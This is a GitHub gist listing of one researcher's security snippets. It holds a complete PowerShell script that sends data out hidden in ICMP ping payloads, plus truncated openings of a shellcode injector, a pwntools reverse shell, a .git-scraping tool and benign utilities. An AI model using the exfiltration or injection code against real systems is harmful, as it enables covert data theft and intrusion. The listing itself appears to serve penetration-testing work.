Skip to content

Instantly share code, notes, and snippets.

View FrankSpierings's full-sized avatar

Frank Spierings FrankSpierings

57 followers · 1 following
View GitHub Profile
@FrankSpierings
FrankSpierings / IcmpExfiltrate.ps1
Last active May 4, 2019 15:09
Powershell - Exfiltrate data through ICMP
$dst = "127.0.0.1";
$data = Get-Process | Select-Object -ExpandProperty Name | Out-String ;
$data = [System.Text.Encoding]::Ascii.GetBytes($data);
$options =(New-Object System.Net.NetworkInformation.PingOptions(64, $true));
$blocksize = 1400;
for($i=0; $i -lt $data.Length; $i+=$blocksize) {
$block = $data[$i..($i + $blocksize -1)];
(New-Object System.Net.NetworkInformation.Ping).Send($dst, 10, $block, $options);
}
@FrankSpierings
FrankSpierings / Inject.cs
Last active May 13, 2019 19:36
Inject shellcode into process on Windows
/*
Compile:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe inject.cs
*/
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Net;
@FrankSpierings
FrankSpierings / reverse_shell_pwntools.py
Last active March 30, 2019 12:58
Reverse shell in pwntools
from pwn import *
# context(arch='x86_64')
context(arch='i386')
host = 'localhost'
port = 4444
if context.arch == 'i386':
sock = 'edx'
@FrankSpierings
FrankSpierings / sign.sh
Created March 28, 2019 18:00
Sign APK
#!/bin/sh
KEYSTORE=my.keystore
KEYSTORE_ALIAS=myalias
PASSWORD=password
APK=some.apk
if [ ! -f ${KEYSTORE} ]; then
keytool -noprompt -genkey -v -keystore ${KEYSTORE} -alias ${KEYSTORE_ALIAS} -keyalg RSA -keysize 2048 -validity 1000 -dname "CN=frank" -storepass ${PASSWORD} -keypass ${PASSWORD}
fi
@FrankSpierings
FrankSpierings / sign.sh
Created March 28, 2019 18:00
Sign APK
#!/bin/sh
KEYSTORE=my.keystore
KEYSTORE_ALIAS=myalias
PASSWORD=password
APK=some.apk
if [ ! -f ${KEYSTORE} ]; then
keytool -noprompt -genkey -v -keystore ${KEYSTORE} -alias ${KEYSTORE_ALIAS} -keyalg RSA -keysize 2048 -validity 1000 -dname "CN=frank" -storepass ${PASSWORD} -keypass ${PASSWORD}
fi
@FrankSpierings
FrankSpierings / solve.py
Last active March 24, 2019 16:48
Simple Angr solver of 1 function
import angr
import claripy
proj = angr.Project('./test', main_opts={'custom_base_addr': 0x00100000})
arg1 = claripy.BVS('arg1', 8)
state = proj.factory.call_state(proj.loader.find_symbol('check').rebased_addr, arg1)
sm = proj.factory.simgr(state)
sm.explore(find=lambda s: b"You win" in s.posix.dumps(1))
@FrankSpierings
FrankSpierings / frida.py
Created March 24, 2019 13:05
Ghidra Plugin - Generate Frida Hooks - Requires Oneshot Decompiler Parameter ID
#TODO write a description for this script
#@author
#@category _NEW_
#@keybinding
#@menupath
#@toolbar
#TODO Add User Code Here
def getFunctions():
@FrankSpierings
FrankSpierings / git-web-puller.py
Last active March 14, 2019 13:49
Grab git files from a webapplication.
import requests
import tempfile
import os
import logging
import shutil
import subprocess
import re
try:
log
@FrankSpierings
FrankSpierings / crewl.py
Created February 5, 2019 12:27
CeWL alternative in Python, based on Scrapy Framework.
# -*- coding: utf-8 -*-
import scrapy
import argparse
import re
from scrapy import signals
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from scrapy.crawler import CrawlerProcess
@FrankSpierings
FrankSpierings / yaai.html
Last active January 29, 2019 20:22
Very Important Work! A reimplementation in HTML5
<html>
<head>
<style>
#container {
font-size: 50px;
color: white;
width: 400px;
height: 260px;
}
#content {